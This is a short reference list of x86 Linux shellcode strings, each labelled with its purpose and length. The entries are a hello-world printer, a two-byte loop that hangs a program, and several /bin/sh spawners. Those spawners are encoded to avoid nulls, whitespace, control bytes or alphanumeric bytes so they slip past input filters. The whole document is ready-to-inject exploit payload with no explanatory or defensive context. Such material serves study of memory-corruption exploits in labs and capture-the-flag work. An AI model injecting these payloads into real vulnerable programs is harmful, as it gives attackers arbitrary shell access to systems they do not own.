Prints “Hello,World!” to screen. (40 bytes)
\xeb\x13\x59\x31\xc0\xb0\x04\x31\xdb\x43\x31\xd2\xb2\x0f\xcd\x80\xb0\x01\x4b\xcd\x80\xe8\xe8\xff\xff\xff\x48\x65\x6c\x6c\x6f\x2c\x77\x6f\x72\x6c\x64\x21\x0a\x0d

Causes program to hang (become unresponsive) (2 bytes)
\xeb\xef

Standard shell code (contains some nulls, avoid using) (43 bytes)
\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x08\x00\x00\x00\x2f\x62\x69\x6e\x2f\x73\x68\x00\x57\x53\x89\xe1\xcd\x80

Standard shell spawn code, no nulls (35 bytes):
\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89\xe1\xcd\x80

Shell spawn code with no ‘whitespace’ bytes, good for scanf (35 bytes)
\x31\xc0\xb0\x30\x01\xc4\x30\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\xb0\xb0\xc0\xe8\x04\xcd\x80\xc0\xe8\x03\xcd\x80

Shell spawn code with no bytes in range (0x00-0x20) (68 bytes)
\x33\xc9\x83\xe9\xf5\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xb7\xf6\xa3\x23\x83\xee\xfc\xe2\xf4\xdd\xfd\xfb\xba\xe5\x90\xcb\x0e\xd4\x7f\x44\x4b\x98\x85\xcb\x23\xdf\xd9\xc1\x4a\xd9\x7f\x40\x71\x5f\xfe\xa3\x23\xb7\xd9\xc1\x4a\xd9\xd9\xd0\x4b\xb7\xa1\xf0\xaa\x56\x3b\x23\x23

Shell spawn code with no alpha bytes (no alphanumeric bytes) (70 bytes)
\xdb\xd1\xba\x61\x56\x30\x3f\xd9\x74\x24\xf4\x5d\x29\xc9\xb1\x0b\x31\x55\x1a\x83\xed\xfc\x03\x55\x16\xe2\x94\x3c\x3b\x67\xcf\x93\x5d\xff\xc2\x70\x2b\x18\x74\x58\x58\x8f\x84\xce\xb1\x2d\xed\x60\x47\x52\xbf\x94\x5f\x95\x3f\x65\x4f\xf7\x56\x0b\xa0\x84\xc0\xd3\xe9\x39\x99\x35\xd8\x3e